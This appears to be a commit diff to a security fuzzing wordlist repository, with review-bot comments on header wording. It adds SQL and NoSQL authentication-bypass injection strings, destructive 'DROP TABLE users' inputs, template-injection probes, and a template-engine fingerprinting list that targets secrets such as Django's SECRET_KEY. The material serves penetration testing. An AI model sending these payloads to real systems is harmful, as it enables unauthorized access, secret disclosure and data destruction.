This commit is contained in:
cbk914
2020-09-30 16:37:47 +02:00
14 changed files with 1738795 additions and 515445 deletions


@@ -9,6 +9,7 @@ $where: '1 == 1'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' || 'a'=='a
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00


@@ -0,0 +1,77 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
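Review bot: This new wordlist has no header describing what it contains or how a consumer should read it, whereas the template-engine list added in the same commit opens with a commented explanation of its purpose, sources and line format. A one-line header such as `# SQL injection authentication-bypass test strings, one entry per line; consumers that do not filter "# " lines must skip this header` would make the file self-describing and keep the two new files consistent. Note that introducing a `#` header line also commits the file to the same "fuzzer ignores lines starting with `# `" convention the other list states, so the two files should document it the same way. The file path of this section is not visible on the page, so the header wording may need to match the directory's naming.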

Fuzzing/XSS/XSS-OFJAAAH.txt Normal file



@@ -543,8 +543,8 @@ http://a/%%30%30
#
# Strings which can cause a SQL injection if inputs are not sanitized
1;DROP TABLE users
1'; DROP TABLE users-- 1
1; SELECT 1
1'; SELECT 1-- 1
' OR 1=1 -- 1
' OR '1'='1


@@ -7,3 +7,5 @@ ${42*42}
<%=42*42 %>
{{=42*42}}
{^xyzm42}1764{/xyzm42}
${donotexists|42*42}
[[${42*42}]]


@@ -0,0 +1,78 @@
# The objective of this dictionary is to help to discover the template engine used
# once a evaluation of a template expression was detected via the following dictionary:
# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
# Special variables are grouped by template engine in order to facilitate the identification.
# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
#
# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
#
# Sources:
# https://portswigger.net/research/server-side-template-injection
# https://github.com/epinna/tplmap
# Custom personal labs
#
# GENERIC: To cause an error and perhaps get technical information
1/0
# FREEMARKER (JAVA)
# https://freemarker.apache.org/docs/ref_specvar.html
.version
.current_template_name
.locale_object
# JINJA2 (PYTHON)
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://stackoverflow.com/a/40346872/451455
self._TemplateReference__context
# DJANGO (PYTHON)
# https://docs.djangoproject.com/en/3.1/ref/settings/
settings
settings.DEBUG
settings.DATABASES
settings.SECRET_KEY
# PUG (NODEJS)
# https://pugjs.org
# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
# Self object is available if the "self" options is set to true
self
# Payload below are more NodeJS related
locals
global
# ERB (RUBY)
# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
ERB.version()
# TORNADO (PYTHON)
# https://www.tornadoweb.org/en/stable/template.html
# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
locals()
globals()
# TWIG (PHP)
# https://twig.symfony.com/doc/3.x/
_self
_self.getTemplateName().__toString
_context
_context|length
_context|keys|first
constant('Twig_Environment::VERSION')
constant('Twig_Environment::VERSION_ID')
constant('Twig_Environment::EXTRA_VERSION')
# VELOCITY (JAVA)
# http://velocity.apache.org/tools/devel/generic.html
$context.keys
$context.TOOLS_VERSION
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
$field.in("org.apache.velocity.runtime.RuntimeConstants")
# THYMELEAF (JAVA)
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
#execInfo
#execInfo.templateStack
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
execInfo
execInfo.templateStack
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
# SMARTY (PHP)
# https://www.smarty.net/docs/en/language.syntax.variables.tpl
# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
$smarty.version
$smarty.config
$smarty.template
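Review bot: The header comment of this new file has several wording slips that make its usage instructions harder to follow: `once a evaluation of a template expression was detected` should read `once an evaluation of a template expression has been detected`, `filter the dictionary before to use it` should read `filter the dictionary before using it`, `Payload below are more NodeJS related` should read `Payloads below are more NodeJS related`, and `indicate usage of Tornado` should read `indicates usage of Tornado`. The header also states that consumers ignore lines starting with `# ` and stresses that the space matters, but it does not say why; a short clarification such as `# (the space matters: some entries, e.g. the Thymeleaf "#execInfo" ones, legitimately begin with "#" and must be kept)` would explain the rule and stop a consumer from dropping every `#`-prefixed line. The `grep -v "# "` example in the header already behaves correctly under that rule, so only the explanation is missing.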